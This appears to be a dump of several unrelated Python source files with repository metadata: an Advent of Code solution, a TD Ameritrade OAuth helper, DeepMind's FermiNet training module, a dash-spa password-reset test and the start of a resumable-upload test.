] | null | null | null | Day2.py | carolinamassae/advent-of-code-2021 | e8911bda88431160b53ba82ca6baa05ee869fe26 | [
"MIT"
] | null | null | null | Day2.py | carolinamassae/advent-of-code-2021 | e8911bda88431160b53ba82ca6baa05ee869fe26 | [
"MIT"
] | null | null | null | from itertools import islice, tee
def main():
with open('Input/day2.txt') as f:
lines = [l.strip('\n') for l in f.readlines()]
print('Part One')
diving_submarine(lines)
print('Part Two')
diving_submarine_2(lines)
def diving_submarine(lines):
x = depth = 0
for line in lines:
command, num = line.split(" ")
num = int(num)
if command == 'forward':
x += num
elif command == 'down':
depth += num
elif command == 'up':
depth -= num
else:
print('bugei')
print(x, ' ', depth, ' Result:', x*depth)
def diving_submarine_2(lines):
x = aim = depth = 0
for line in lines:
command, num = line.split(" ")
num = int(num)
print(command, ' ', num)
if command == 'forward':
x += num
if x != 0:
depth += num*aim
elif command == 'down':
aim += num
elif command == 'up':
aim -= num
print(x, ' ', depth, ' Result:', x*depth)
if __name__ == "__main__":
main()
| 23.104167 | 54 | 0.487827 |
f94c983fde9a212a264eff0d48528315c667b3f1 | 4,059 | py | Python | tdameritrade/auth/__init__.py | t-triobox/tdameritrade | 9a6a4162ca336cc7e28bc6ac2d2d718fb3e9f069 | [
"Apache-2.0"
] | 528 | 2018-08-19T17:06:29.000Z | 2022-03-28T03:39:22.000Z | tdameritrade/auth/__init__.py | t-triobox/tdameritrade | 9a6a4162ca336cc7e28bc6ac2d2d718fb3e9f069 | [
"Apache-2.0"
] | 122 | 2018-10-23T00:06:22.000Z | 2022-03-27T15:17:24.000Z | tdameritrade/auth/__init__.py | t-triobox/tdameritrade | 9a6a4162ca336cc7e28bc6ac2d2d718fb3e9f069 | [
"Apache-2.0"
] | 232 | 2018-09-07T19:13:00.000Z | 2022-01-28T17:32:17.000Z | import os
import os.path
import sys
import time
import urllib.parse as up
from shutil import which
import requests
def authentication(client_id, redirect_uri, tdauser=None, tdapass=None):
    """Run the TD Ameritrade OAuth2 authorization-code flow in a Chrome window.

    Opens the TD Ameritrade login page with Selenium, retrieves the
    authorization ``code`` from the redirect URL, then exchanges it for
    access/refresh tokens at the oauth2/token endpoint.

    Args:
        client_id: OAuth consumer key; "@AMER.OAUTHAP" is appended below.
        redirect_uri: callback URL registered with the TD Ameritrade app.
        tdauser: optional account user name for fully automated login
            (falls back to the TDAUSER environment variable).
        tdapass: optional account password (falls back to TDAPASS).

    Returns:
        dict: parsed JSON token response from the oauth2/token endpoint.

    Raises:
        Exception: if the token exchange does not return HTTP 200.
    """
    # Imported lazily so the rest of the package works without selenium
    # unless this interactive flow is actually used.
    from selenium import webdriver

    client_id = client_id + "@AMER.OAUTHAP"
    url = (
        "https://auth.tdameritrade.com/auth?response_type=code&redirect_uri="
        + up.quote(redirect_uri)
        + "&client_id="
        + up.quote(client_id)
    )

    # Locate the Chrome binary per platform; falls back to Selenium's default
    # discovery when none of the known install paths exist.
    options = webdriver.ChromeOptions()
    if sys.platform == "darwin":
        # MacOS
        if os.path.exists(
            "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
        ):
            options.binary_location = (
                "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
            )
        elif os.path.exists("/Applications/Chrome.app/Contents/MacOS/Google Chrome"):
            options.binary_location = (
                "/Applications/Chrome.app/Contents/MacOS/Google Chrome"
            )
    elif "linux" in sys.platform:
        # Linux
        options.binary_location = (
            which("google-chrome") or which("chrome") or which("chromium")
        )
    else:
        # Windows
        if os.path.exists(
            "C:/Program Files (x86)/Google/Chrome/Application/chrome.exe"
        ):
            options.binary_location = (
                "C:/Program Files (x86)/Google/Chrome/Application/chrome.exe"
            )
        elif os.path.exists("C:/Program Files/Google/Chrome/Application/chrome.exe"):
            options.binary_location = (
                "C:/Program Files/Google/Chrome/Application/chrome.exe"
            )

    chrome_driver_binary = which("chromedriver") or "/usr/local/bin/chromedriver"
    driver = webdriver.Chrome(chrome_driver_binary, chrome_options=options)
    driver.get(url)

    # Set tdauser and tdapass from environment if TDAUSER and TDAPASS environment variables were defined
    tdauser = tdauser or os.environ.get("TDAUSER", "")
    tdapass = tdapass or os.environ.get("TDAPASS", "")

    # Fully automated oauth2 authentication (if tdauser and tdapass were inputed into the function, or found as
    # environment variables)
    if tdauser and tdapass:
        ubox = driver.find_element_by_id("username")
        pbox = driver.find_element_by_id("password")
        ubox.send_keys(tdauser)
        pbox.send_keys(tdapass)
        # NOTE(review): "accept" is clicked twice — presumably to step through
        # the login and then the OAuth-grant page; confirm against the site.
        driver.find_element_by_id("accept").click()
        driver.find_element_by_id("accept").click()
        # Poll until the browser lands on the redirect URL carrying ?code=...
        while True:
            try:
                code = up.unquote(driver.current_url.split("code=")[1])
                if code != "":
                    break
                else:
                    time.sleep(2)
            except (TypeError, IndexError):
                pass
    else:
        # Manual flow: the user logs in and approves access in the browser.
        input("after giving access, hit enter to continue")
        code = up.unquote(driver.current_url.split("code=")[1])
    driver.close()

    # Exchange the one-time authorization code for tokens.
    resp = requests.post(
        "https://api.tdameritrade.com/v1/oauth2/token",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={
            "grant_type": "authorization_code",
            "refresh_token": "",
            "access_type": "offline",
            "code": code,
            "client_id": client_id,
            "redirect_uri": redirect_uri,
        },
    )
    if resp.status_code != 200:
        raise Exception("Could not authenticate!")
    return resp.json()
def access_token(refresh_token, client_id):
    """Exchange an OAuth2 refresh token for a fresh access token.

    Args:
        refresh_token: refresh token obtained from a prior ``authentication``
            call.
        client_id: TD Ameritrade OAuth client id (consumer key).

    Returns:
        dict: parsed JSON token response (access token, expiry, etc.).

    Raises:
        Exception: if the token endpoint does not return HTTP 200. The
            message now includes the status code so failures are diagnosable.
    """
    resp = requests.post(
        "https://api.tdameritrade.com/v1/oauth2/token",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        data={
            "grant_type": "refresh_token",
            "refresh_token": refresh_token,
            "client_id": client_id,
        },
    )
    if resp.status_code != 200:
        # Surface the HTTP status: a bare "Could not authenticate!" gave the
        # caller nothing to act on.
        raise Exception(
            "Could not authenticate! Token endpoint returned HTTP %d"
            % resp.status_code
        )
    return resp.json()
def main():
    """Interactively collect OAuth credentials and print the token response."""
    consumer_key = input("client id:")
    callback_url = input("redirect uri:")
    tokens = authentication(consumer_key, callback_url)
    print(tokens)
| 32.472 | 111 | 0.605075 |
75772d21417baa16fc4160c5477d2c2d553a4730 | 21,276 | py | Python | ferminet/train.py | rickyHong/ferminet | 39c638f60349fa25da073780e3fa9052433e215e | [
"Apache-2.0"
] | 1 | 2020-10-20T06:53:51.000Z | 2020-10-20T06:53:51.000Z | ferminet/train.py | 13571815901/ferminet | 27f90beb57de62333989a5a64f47d1759b33804e | [
"Apache-2.0"
] | null | null | null | ferminet/train.py | 13571815901/ferminet | 27f90beb57de62333989a5a64f47d1759b33804e | [
"Apache-2.0"
] | 1 | 2021-04-25T10:05:15.000Z | 2021-04-25T10:05:15.000Z | # Lint as: python3
# Copyright 2018 DeepMind Technologies Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Learn ground state wavefunctions for molecular systems using VMC."""
import copy
import os
from typing import Any, Mapping, Optional, Sequence, Tuple
from absl import logging
import attr
from ferminet import hamiltonian
from ferminet import mcmc
from ferminet import mean_corrected_kfac_opt
from ferminet import networks
from ferminet import qmc
from ferminet.utils import elements
from ferminet.utils import scf
from ferminet.utils import system
import numpy as np
import tensorflow.compat.v1 as tf
def _validate_directory(obj, attribute, value):
"""Validates value is a directory."""
del obj
if value and not os.path.isdir(value):
raise ValueError(f'{attribute.name} is not a directory')
@attr.s(auto_attribs=True)
class LoggingConfig:
  """Logging information for Fermi Nets.

  Attributes:
    result_path: directory to use for saving model parameters and calculations
      results. Created if does not exist.
    save_frequency: frequency (in minutes) at which parameters are saved.
    restore_path: directory to use for restoring model parameters.
    stats_frequency: frequency (in iterations) at which statistics (via stats
      hooks) are updated and stored.
    replicas: the number of replicas used during training. Will be set
      automatically.
    walkers: If true, log walkers at every step.
    wavefunction: If true, log wavefunction at every step.
    local_energy: If true, log local energy at every step.
    config: dictionary of additional information about the calculation setup.
      Reported along with calculation statistics.
  """
  result_path: str = '.'
  save_frequency: float = 10
  # Validated at construction: if set, must point at an existing directory.
  restore_path: str = attr.ib(default=None, validator=_validate_directory)
  stats_frequency: int = 1
  replicas: int = 1
  walkers: bool = False
  wavefunction: bool = False
  local_energy: bool = False
  # Converted to a plain dict so any mapping (or iterable of pairs) works.
  config: Mapping[str, Any] = attr.ib(converter=dict,
                                      default=attr.Factory(dict))
@attr.s(auto_attribs=True)
class MCMCConfig:
  """Markov Chain Monte Carlo configuration for Fermi Nets.

  Attributes:
    burn_in: Number of burn in steps after pretraining.
    steps: Number of MCMC steps to make between network updates.
    init_width: Width of (atom-centred) Gaussians used to generate initial
      electron configurations.
    move_width: Width of Gaussian used for random moves.
    init_means: Iterable of 3*nelectrons giving the mean initial position of
      each electron. Configurations are drawn using Gaussians of width
      init_width at each 3D position. Alpha electrons are listed before beta
      electrons. If empty, electrons are assigned to atoms based upon the
      isolated atom spin configuration. Expert use only.
  """
  burn_in: int = 100
  steps: int = 10
  init_width: float = 0.8
  move_width: float = 0.02
  init_means: Optional[Sequence[float]] = None
@attr.s(auto_attribs=True)
class PretrainConfig:
  """Hartree-Fock pretraining algorithm configuration for Fermi Nets.

  Attributes:
    iterations: Number of iterations for which to pretrain the network to match
      Hartree-Fock orbitals. Set to 0 to skip pretraining entirely.
    basis: Basis set used to run Hartree-Fock calculation in PySCF.
  """
  iterations: int = 1000
  basis: str = 'sto-3g'
@attr.s(auto_attribs=True)
class OptimConfig:
  """Optimization configuration for Fermi Nets.

  Attributes:
    iterations: Number of iterations.
    clip_el: If not none, scale at which to clip local energy.
    learning_rate: learning rate.
    learning_rate_decay: exponent of learning rate decay.
    learning_rate_delay: scale of the rate decay.
    use_kfac: Use the K-FAC optimizer if true, ADAM optimizer otherwise.
    check_loss: Apply gradient update only if the loss is not NaN. If true,
      training could be slightly slower but the checkpoint written out when a
      NaN is detected will be with the network weights which led to the NaN.
    deterministic: CPU only mode that also enforces determinism. Will run
      *significantly* slower if used.
  """
  iterations: int = 1000000
  learning_rate: float = 1.e-4
  learning_rate_decay: float = 1.0
  learning_rate_delay: float = 10000.0
  clip_el: float = 5.0
  use_kfac: bool = True
  check_loss: bool = False
  deterministic: bool = False
@attr.s(auto_attribs=True)
class KfacConfig:
  """K-FAC configuration - see docs at https://github.com/tensorflow/kfac/."""
  # Step frequencies for recomputing the Fisher inverse and the covariance
  # statistics (see the K-FAC docs for details on each knob below).
  invert_every: int = 1
  cov_update_every: int = 1
  damping: float = 0.001
  # Decay rate of the exponential moving average over covariance statistics.
  cov_ema_decay: float = 0.95
  momentum: float = 0.0
  # Restricted to the momentum schemes implemented by the K-FAC optimizer.
  momentum_type: str = attr.ib(
      default='regular',
      validator=attr.validators.in_(
          ['regular', 'adam', 'qmodel', 'qmodel_fixedmu']))
  # Automatic damping-adaptation settings; used only when adapt_damping=True.
  adapt_damping: bool = False
  damping_adaptation_decay: float = 0.9
  damping_adaptation_interval: int = 5
  min_damping: float = 1.e-5
  norm_constraint: float = 0.001
@attr.s(auto_attribs=True)
class NetworkConfig:
  """Network configuration for Fermi Net.

  Attributes:
    architecture: The choice of architecture to run the calculation with. Either
      "ferminet" or "slater" for the Fermi Net and standard Slater determinant
      respectively.
    hidden_units: Number of hidden units in each layer of the network. If
      the Fermi Net with one- and two-electron streams is used, a tuple is
      provided for each layer, with the first element giving the number of
      hidden units in the one-electron stream and the second element giving the
      number of units in the two-electron stream. Otherwise, each layer is
      represented by a single integer.
    determinants: Number of determinants to use.
    r12_en_features: Include r12/distance features between electrons and nuclei.
      Highly recommended.
    r12_ee_features: Include r12/distance features between pairs of electrons.
      Highly recommended.
    pos_ee_features: Include electron-electron position features. Highly
      recommended.
    use_envelope: Include multiplicative exponentially-decaying envelopes on
      each orbital. Calculations will not converge if set to False.
    backflow: Include backflow transformation in input coordinates.
      Only for use if network_architecture == "slater". Implies build_backflow
      is also True.
    build_backflow: Create backflow weights but do not include backflow
      coordinate transformation in the network. Use to train a Slater-Jastrow
      architecture and then train a Slater-Jastrow-Backflow architecture
      based on it in a two-stage optimization process.
    residual: Use residual connections in network. Recommended.
    after_det: Number of hidden units in each layer of the neural network after
      the determinants. By default, just takes a weighted sum of
      determinants with no nonlinearity.
    jastrow_en: Include electron-nuclear Jastrow factor. Only relevant with
      Slater-Jastrow-Backflow architectures.
    jastrow_ee: Include electron-electron Jastrow factor. Only relevant with
      Slater-Jastrow-Backflow architectures.
    jastrow_een: Include electron-electron-nuclear Jastrow factor. Only
      relevant with Slater-Jastrow-Backflow architectures.
  """
  # Construction rejects anything other than the two supported architectures.
  architecture: str = attr.ib(
      default='ferminet', validator=attr.validators.in_(['ferminet', 'slater']))
  # Four layers of (one-electron stream, two-electron stream) widths.
  hidden_units: Sequence[Tuple[int, int]] = ((256, 32),) * 4
  determinants: int = 16
  r12_en_features: bool = True
  r12_ee_features: bool = True
  pos_ee_features: bool = True
  use_envelope: bool = True
  backflow: bool = False
  build_backflow: bool = False
  residual: bool = True
  after_det: Sequence[int] = (1,)
  jastrow_en: bool = False
  jastrow_ee: bool = False
  jastrow_een: bool = False
def assign_electrons(molecule, electrons):
  """Assigns electrons to atoms using non-interacting spin configurations.

  Args:
    molecule: List of Hamiltonian.Atom objects for each atom in the system.
    electrons: Pair of ints giving number of alpha (spin-up) and beta
      (spin-down) electrons.

  Returns:
    1D np.ndarray of length 3N containing initial mean positions of each
    electron based upon the atom positions, where N is the total number of
    electrons. The first 3*electrons[0] positions correspond to the alpha
    (spin-up) electrons and the next 3*electrons[1] to the beta (spin-down)
    electrons.

  Raises:
    RuntimeError: if a different number of electrons or different spin
      polarisation is generated.
  """
  # Assign electrons based upon unperturbed atoms and ignore impact of
  # fractional nuclear charge.
  nuclei = [int(round(atom.charge)) for atom in molecule]
  total_charge = sum(nuclei) - sum(electrons)
  # Construct a dummy iso-electronic neutral system.
  neutral_molecule = [copy.copy(atom) for atom in molecule]
  if total_charge != 0:
    logging.warning(
        'Charged system. Using heuristics to set initial electron positions')
  charge = 1 if total_charge > 0 else -1
  # Neutralise the dummy system one unit of charge at a time; atoms whose
  # charge reaches zero are removed entirely.
  while total_charge != 0:
    # Poor proxy for electronegativity.
    atom_index = nuclei.index(max(nuclei) if total_charge < 0 else min(nuclei))
    atom = neutral_molecule[atom_index]
    atom.charge -= charge
    atom.atomic_number = int(round(atom.charge))
    if int(round(atom.charge)) == 0:
      neutral_molecule.pop(atom_index)
    else:
      atom.symbol = elements.ATOMIC_NUMS[atom.atomic_number].symbol
    total_charge -= charge
    nuclei = [int(round(atom.charge)) for atom in neutral_molecule]

  # spin polarisation = N_alpha - N_beta for a [N_alpha, N_beta] pair.
  spin_pol = lambda electrons: electrons[0] - electrons[1]
  abs_spin_pol = abs(spin_pol(electrons))
  if len(neutral_molecule) == 1:
    elecs_atom = [electrons]
  else:
    elecs_atom = []
    spin_pol_assigned = 0
    for ion in neutral_molecule:
      # Greedily assign up and down electrons based upon the ground state spin
      # configuration of an isolated atom.
      atom_spin_pol = elements.ATOMIC_NUMS[ion.atomic_number].spin_config
      nelec = ion.atomic_number
      na = (nelec + atom_spin_pol) // 2
      nb = nelec - na
      # Attempt to keep spin polarisation as close to 0 as possible.
      if (spin_pol_assigned > 0 and
          spin_pol_assigned + atom_spin_pol > abs_spin_pol):
        elec_atom = [nb, na]
      else:
        elec_atom = [na, nb]
      spin_pol_assigned += spin_pol(elec_atom)
      elecs_atom.append(elec_atom)

  electrons_assigned = [sum(e) for e in zip(*elecs_atom)]
  spin_pol_assigned = spin_pol(electrons_assigned)
  if np.sign(spin_pol_assigned) == -np.sign(abs_spin_pol):
    # Started with the wrong guess for spin-up vs spin-down.
    elecs_atom = [e[::-1] for e in elecs_atom]
    spin_pol_assigned = -spin_pol_assigned

  if spin_pol_assigned != abs_spin_pol:
    logging.info('Spin polarisation does not match isolated atoms. '
                 'Using heuristics to set initial electron positions.')
    # Flip one up<->down pair at a time on the most-polarised atom until the
    # requested total spin polarisation is reached (each swap changes the
    # total polarisation by +/-2).
    while spin_pol_assigned != abs_spin_pol:
      atom_spin_pols = [abs(spin_pol(e)) for e in elecs_atom]
      atom_index = atom_spin_pols.index(max(atom_spin_pols))
      elec_atom = elecs_atom[atom_index]
      if spin_pol_assigned < abs_spin_pol and elec_atom[0] <= elec_atom[1]:
        elec_atom[0] += 1
        elec_atom[1] -= 1
        spin_pol_assigned += 2
      elif spin_pol_assigned < abs_spin_pol and elec_atom[0] > elec_atom[1]:
        elec_atom[0] -= 1
        elec_atom[1] += 1
        spin_pol_assigned += 2
      elif spin_pol_assigned > abs_spin_pol and elec_atom[0] > elec_atom[1]:
        elec_atom[0] -= 1
        elec_atom[1] += 1
        spin_pol_assigned -= 2
      else:
        elec_atom[0] += 1
        elec_atom[1] -= 1
        spin_pol_assigned -= 2
    electrons_assigned = [sum(e) for e in zip(*elecs_atom)]

  if spin_pol(electrons_assigned) == -spin_pol(electrons):
    # Assigned polarisation has the right magnitude but the wrong sign;
    # swap alpha and beta everywhere.
    elecs_atom = [e[::-1] for e in elecs_atom]
    electrons_assigned = electrons_assigned[::-1]

  logging.info(
      'Electrons assigned %s.', ', '.join([
          '{}: {}'.format(atom.symbol, elec_atom)
          for atom, elec_atom in zip(molecule, elecs_atom)
      ]))
  # Sanity checks: the heuristics above must reproduce the requested counts.
  if any(e != e_assign for e, e_assign in zip(electrons, electrons_assigned)):
    raise RuntimeError(
        'Assigned incorrect number of electrons ([%s instead of %s]' %
        (electrons_assigned, electrons))
  if any(min(ne) < 0 for ne in zip(*elecs_atom)):
    raise RuntimeError('Assigned negative number of electrons!')
  # All alpha-electron means first, then all beta-electron means, each
  # electron placed at the coordinates of its assigned atom.
  electron_positions = np.concatenate([
      np.tile(atom.coords, e[0])
      for atom, e in zip(neutral_molecule, elecs_atom)
  ] + [
      np.tile(atom.coords, e[1])
      for atom, e in zip(neutral_molecule, elecs_atom)
  ])
  return electron_positions
def train(molecule: Sequence[system.Atom],
          spins: Tuple[int, int],
          batch_size: int,
          network_config: Optional[NetworkConfig] = None,
          pretrain_config: Optional[PretrainConfig] = None,
          optim_config: Optional[OptimConfig] = None,
          kfac_config: Optional[KfacConfig] = None,
          mcmc_config: Optional[MCMCConfig] = None,
          logging_config: Optional[LoggingConfig] = None,
          multi_gpu: bool = False,
          double_precision: bool = False,
          graph_path: Optional[str] = None):
  """Configures and runs training loop.

  Args:
    molecule: molecule description.
    spins: pair of ints specifying number of spin-up and spin-down electrons
      respectively.
    batch_size: batch size. Also referred to as the number of Markov Chain
      Monte Carlo configurations/walkers.
    network_config: network configuration. Default settings in NetworkConfig
      are used if not specified.
    pretrain_config: pretraining configuration. Default settings in
      PretrainConfig are used if not specified.
    optim_config: optimization configuration. Default settings in OptimConfig
      are used if not specified.
    kfac_config: K-FAC configuration. Default settings in KfacConfig are used
      if not specified.
    mcmc_config: Markov Chain Monte Carlo configuration. Default settings in
      MCMCConfig are used if not specified.
    logging_config: logging and checkpoint configuration. Default settings in
      LoggingConfig are used if not specified.
    multi_gpu: Use all available GPUs. Default: use only a single GPU.
    double_precision: use tf.float64 instead of tf.float32 for all operations.
      Warning - double precision is not currently functional with K-FAC.
    graph_path: directory to save a representation of the TF graph to. Not
      saved if None.

  Raises:
    RuntimeError: if mcmc_config.init_means is supplied but is of the
      incorrect length.
  """
  # Fill in defaults for every configuration object not supplied.
  if not mcmc_config:
    mcmc_config = MCMCConfig()
  if not logging_config:
    logging_config = LoggingConfig()
  if not pretrain_config:
    pretrain_config = PretrainConfig()
  if not optim_config:
    optim_config = OptimConfig()
  if not kfac_config:
    kfac_config = KfacConfig()
  if not network_config:
    network_config = NetworkConfig()

  nelectrons = sum(spins)
  precision = tf.float64 if double_precision else tf.float32

  if multi_gpu:
    strategy = tf.distribute.MirroredStrategy()
  else:
    # Get the default (single-device) strategy.
    strategy = tf.distribute.get_strategy()
  if multi_gpu:
    # batch_size is interpreted as the global batch size; each replica works
    # on its share of the walkers.
    batch_size = batch_size // strategy.num_replicas_in_sync
    logging.info('Setting per-GPU batch size to %s.', batch_size)
    logging_config.replicas = strategy.num_replicas_in_sync
  logging.info('Running on %s replicas.', strategy.num_replicas_in_sync)

  # Create a re-entrant variable scope for network.
  with tf.variable_scope('model') as model:
    pass

  with strategy.scope():
    with tf.variable_scope(model, auxiliary_name_scope=False) as model1:
      with tf.name_scope(model1.original_name_scope):
        fermi_net = networks.FermiNet(
            atoms=molecule,
            nelectrons=spins,
            slater_dets=network_config.determinants,
            hidden_units=network_config.hidden_units,
            after_det=network_config.after_det,
            architecture=network_config.architecture,
            r12_ee_features=network_config.r12_ee_features,
            r12_en_features=network_config.r12_en_features,
            pos_ee_features=network_config.pos_ee_features,
            build_backflow=network_config.build_backflow,
            use_backflow=network_config.backflow,
            jastrow_en=network_config.jastrow_en,
            jastrow_ee=network_config.jastrow_ee,
            jastrow_een=network_config.jastrow_een,
            logdet=True,
            envelope=network_config.use_envelope,
            residual=network_config.residual,
            pretrain_iterations=pretrain_config.iterations)

    # Hartree-Fock solution used as the pretraining target.
    scf_approx = scf.Scf(
        molecule,
        nelectrons=spins,
        restricted=False,
        basis=pretrain_config.basis)
    if pretrain_config.iterations > 0:
      scf_approx.run()

    hamiltonian_ops = hamiltonian.operators(molecule, nelectrons)
    if mcmc_config.init_means:
      if len(mcmc_config.init_means) != 3 * nelectrons:
        raise RuntimeError('Initial electron positions of incorrect shape. '
                           '({} not {})'.format(
                               len(mcmc_config.init_means), 3 * nelectrons))
      init_means = [float(x) for x in mcmc_config.init_means]
    else:
      init_means = assign_electrons(molecule, spins)

    # Build the MCMC state inside the same variable scope as the network.
    with tf.variable_scope(model, auxiliary_name_scope=False) as model1:
      with tf.name_scope(model1.original_name_scope):
        data_gen = mcmc.MCMC(
            fermi_net,
            batch_size,
            init_mu=init_means,
            init_sigma=mcmc_config.init_width,
            move_sigma=mcmc_config.move_width,
            dtype=precision)
    # Separate sampler over the Hartree-Fock product, used for pretraining.
    with tf.variable_scope('HF_data_gen'):
      hf_data_gen = mcmc.MCMC(
          scf_approx.tf_eval_slog_hartree_product,
          batch_size,
          init_mu=init_means,
          init_sigma=mcmc_config.init_width,
          move_sigma=mcmc_config.move_width,
          dtype=precision)

    # Inverse power-law learning-rate decay driven by the global step.
    with tf.name_scope('learning_rate_schedule'):
      global_step = tf.train.get_or_create_global_step()
      lr = optim_config.learning_rate * tf.pow(
          (1.0 / (1.0 + (tf.cast(global_step, tf.float32) /
                         optim_config.learning_rate_delay))),
          optim_config.learning_rate_decay)

    if optim_config.learning_rate < 1.e-10:
      logging.warning('Learning rate less than 10^-10. Not using an optimiser.')
      optim_fn = lambda _: None
      update_cached_data = None
    elif optim_config.use_kfac:
      # Cache of the previous batch of walkers; required by K-FAC's damping
      # adaptation, which re-evaluates the loss on the previous batch.
      cached_data = tf.get_variable(
          'MCMC_cache',
          initializer=tf.zeros(shape=data_gen.walkers.shape, dtype=precision),
          use_resource=True,
          trainable=False,
          dtype=precision,
      )
      if kfac_config.adapt_damping:
        update_cached_data = tf.assign(cached_data, data_gen.walkers)
      else:
        update_cached_data = None
      optim_fn = lambda layer_collection: mean_corrected_kfac_opt.MeanCorrectedKfacOpt(  # pylint: disable=g-long-lambda
          invert_every=kfac_config.invert_every,
          cov_update_every=kfac_config.cov_update_every,
          learning_rate=lr,
          norm_constraint=kfac_config.norm_constraint,
          damping=kfac_config.damping,
          cov_ema_decay=kfac_config.cov_ema_decay,
          momentum=kfac_config.momentum,
          momentum_type=kfac_config.momentum_type,
          loss_fn=lambda x: tf.nn.l2_loss(fermi_net(x)[0]),
          train_batch=data_gen.walkers,
          prev_train_batch=cached_data,
          layer_collection=layer_collection,
          batch_size=batch_size,
          adapt_damping=kfac_config.adapt_damping,
          is_chief=True,
          damping_adaptation_decay=kfac_config.damping_adaptation_decay,
          damping_adaptation_interval=kfac_config.damping_adaptation_interval,
          min_damping=kfac_config.min_damping,
          use_passed_loss=False,
          estimation_mode='exact',
      )
    else:
      adam = tf.train.AdamOptimizer(lr)
      optim_fn = lambda _: adam
      update_cached_data = None

    qmc_net = qmc.QMC(
        hamiltonian_ops,
        fermi_net,
        data_gen,
        hf_data_gen,
        clip_el=optim_config.clip_el,
        check_loss=optim_config.check_loss,
    )

  # Run burn-in, optional pretraining, and the main VMC optimisation loop.
  qmc_net.train(
      optim_fn,
      optim_config.iterations,
      logging_config,
      using_kfac=optim_config.use_kfac,
      strategy=strategy,
      scf_approx=scf_approx,
      global_step=global_step,
      determinism_mode=optim_config.deterministic,
      cached_data_op=update_cached_data,
      write_graph=os.path.abspath(graph_path) if graph_path else None,
      burn_in=mcmc_config.burn_in,
      mcmc_steps=mcmc_config.steps,
  )
0a5089d018fb9bab6a938b1368743d0c5db5d615 | 2,360 | py | Python | tests/admin/forgot_password_test.py | stevej2608/dash-spa | aaf79e1df1af4f3afc2efcdc2b92a7dcaf74f673 | [
"MIT"
] | 27 | 2019-09-24T18:31:14.000Z | 2022-03-01T16:44:21.000Z | tests/admin/forgot_password_test.py | stevej2608/dash-spa | aaf79e1df1af4f3afc2efcdc2b92a7dcaf74f673 | [
"MIT"
] | 1 | 2021-12-31T08:29:08.000Z | 2022-02-18T06:49:51.000Z | tests/admin/forgot_password_test.py | stevej2608/dash-spa | aaf79e1df1af4f3afc2efcdc2b92a7dcaf74f673 | [
"MIT"
] | 4 | 2019-09-26T19:21:39.000Z | 2022-02-12T18:51:20.000Z | from tests.admin import USER_EMAIL
# Password the test sets during the reset flow.
NEW_PASSWORD = 'bigjoe66'
# Arguments captured from the mocked mailer / password-changer, shared
# between the mocks and the test body.
mail_args = {}
def test_admin_forgot(mocker, duo):
    """End-to-end browser walk through the admin 'forgot password' flow.

    Patches the outbound email (to capture the verification code) and the
    password changer (to capture the new password), then drives the
    forgot -> verify -> reset pages and expects to land back on the login
    page. NOTE(review): relies on the dash-duo-style ``duo`` fixture and
    pytest-mock's ``mocker`` — confirm fixture wiring in conftest.
    """
    # Mock the template emailer
    def mock_send(self, sender, receiver, subject, test_mode):
        mail_args.update(self.args)
        mail_args['sender'] = sender
        mail_args['receiver'] = receiver
        mail_args['subject'] = subject
        mail_args['code'] = self.args['code']
    mocker.patch('dash_spa.admin.template_mailer.TemplateMailer.send', mock_send)
    # Mock password changer
    def mock_change_password(self, email, password):
        mail_args['new_password'] = password
        return True
    mocker.patch('dash_spa.admin.login_manager.AdminLoginManager.change_password', mock_change_password)
    # Render the forgot password page, enter the test user email.
    duo.server_url = duo.server_url + "/admin/forgot"
    result = duo.wait_for_text_to_equal("#admin-forgot-btn", "Reset Request", timeout=20)
    assert result
    email=duo.find_element("#admin-forgot-email")
    email.send_keys(USER_EMAIL)
    forgot_btn = duo.find_element("#admin-forgot-btn")
    forgot_btn.click()
    # A verification code is sent by email, this is intercepted
    # by TemplateMailer.mock_send(). The user is automatically redirected to
    # the verification code page.
    # Enter verification code
    result = duo.wait_for_text_to_equal("#admin-forgot1-btn", "Enter Verification Code", timeout=20)
    assert result
    code_input=duo.find_element("#admin-forgot1-code")
    code_input.send_keys(mail_args['code'])
    reset_btn=duo.find_element("#admin-forgot1-btn")
    reset_btn.click()
    # If the verification code checks out the user is redirected to the password
    # reset page
    result = duo.wait_for_text_to_equal("#admin-forgot2-btn", "Update Password", timeout=20)
    assert result
    # Enter the new password.
    password=duo.find_element("#admin-forgot2-password")
    password.send_keys(NEW_PASSWORD)
    confirm_password=duo.find_element("#admin-forgot2-confirm_password")
    confirm_password.send_keys(NEW_PASSWORD)
    reset_btn=duo.find_element("#admin-forgot2-btn")
    reset_btn.click()
    # If new password is accepted the user is redirected to the login page.
    result = duo.wait_for_text_to_equal("#admin-loginfrm-btn", "Sign In", timeout=20)
    assert result
b8d83157a837cd367665ae212ae0e7561f374985 | 12,549 | py | Python | tests/unit/requests/test_upload.py | plamut/google-resumable-media-python | fcc24fcabd75424bb289c26aeda9bfbccd084d1e | [
"Apache-2.0"
] | null | null | null | tests/unit/requests/test_upload.py | plamut/google-resumable-media-python | fcc24fcabd75424bb289c26aeda9bfbccd084d1e | [
"Apache-2.0"
] | null | null | null | tests/unit/requests/test_upload.py | plamut/google-resumable-media-python | fcc24fcabd75424bb289c26aeda9bfbccd084d1e | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http.client
import io
import json
import mock
from google import resumable_media
import google.resumable_media.requests.upload as upload_mod
# Endpoint templates for the three GCS upload strategies exercised below.
URL_PREFIX = "https://www.googleapis.com/upload/storage/v1/b/{BUCKET}/o"
SIMPLE_URL = URL_PREFIX + "?uploadType=media&name={OBJECT}"
MULTIPART_URL = URL_PREFIX + "?uploadType=multipart"
RESUMABLE_URL = URL_PREFIX + "?uploadType=resumable"
